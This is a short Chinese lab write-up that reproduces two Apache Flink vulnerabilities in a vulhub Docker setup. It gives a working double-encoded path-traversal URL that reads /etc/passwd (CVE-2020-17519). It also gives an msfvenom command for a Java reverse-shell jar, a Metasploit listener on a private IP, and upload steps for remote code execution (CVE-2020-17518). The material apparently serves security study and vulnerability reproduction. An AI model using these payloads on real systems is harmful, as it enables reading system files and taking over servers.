业精于勤而荒于嬉,行成于思而毁于随
使用 vulnhub 搭建环境,直接 docker-compose up -d 启动环境
访问 IP:8081

先复现个最简单的任意文件读取 (CVE-2020-17519)
影响版本 : 1.11.0 1.11.1 1.11.2
直接读取 /etc/passwd 文件
POC:
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

再复现任意文件上传(CVE-2020-17518)
影响版本 : 1.5.1 - 1.11.2
使用 msfvenom 生成 java 反弹 shell
1 | msfvenom -p java/shell_reverse_tcp LHOST=IP LPORT=端口 -f jar > 生成的jar包 |

再创建一个监听
1 | handler -p java/shell_reverse_tcp -H 10.211.55.11 -P 2231 |

然后上传到网站,选择 Submit New Job ,点击 Add New 上传 jar 包 ,然后选择上传的 jar 包,点击 Submit

这样就可以上线了,但是我没有在外网搭建msf,也不想做内网穿透,就不展示上线了